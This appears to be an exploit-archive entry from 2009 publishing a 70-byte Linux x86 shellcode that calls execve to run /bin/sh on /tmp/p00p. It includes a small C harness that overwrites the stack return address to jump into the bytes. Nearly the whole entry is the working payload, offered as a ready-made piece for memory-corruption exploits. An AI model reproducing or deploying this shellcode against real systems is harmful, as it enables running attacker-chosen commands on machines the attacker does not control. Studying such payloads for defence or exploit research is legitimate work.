Linux/x86 - execve(/bin/sh /tmp/p00p) Shellcode (70 bytes)

2009-01-01 11:05:03

Author: zillion
EMail: [email protected]
Home: http://www.safemode.org


Linux x86 shellcode that does an execve of /bin/sh /tmp/p00p.


File name: execve-tmp-p00p.c


/*
* This shellcode will do /bin/sh /tmp/p00p ;-)
* Written by [email protected]
*
*/

char shellcode[]=
"\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x11\x89\x76\x12\x8d"
"\x5e\x08\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
"\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\x38\x2f\x74\x6d\x70\x2f\x70\x30\x30\x70\x32\x33\x34"
"\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";

int main()
{

int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

Fixes

No fixes

In order to submit a new fix you need to be registered.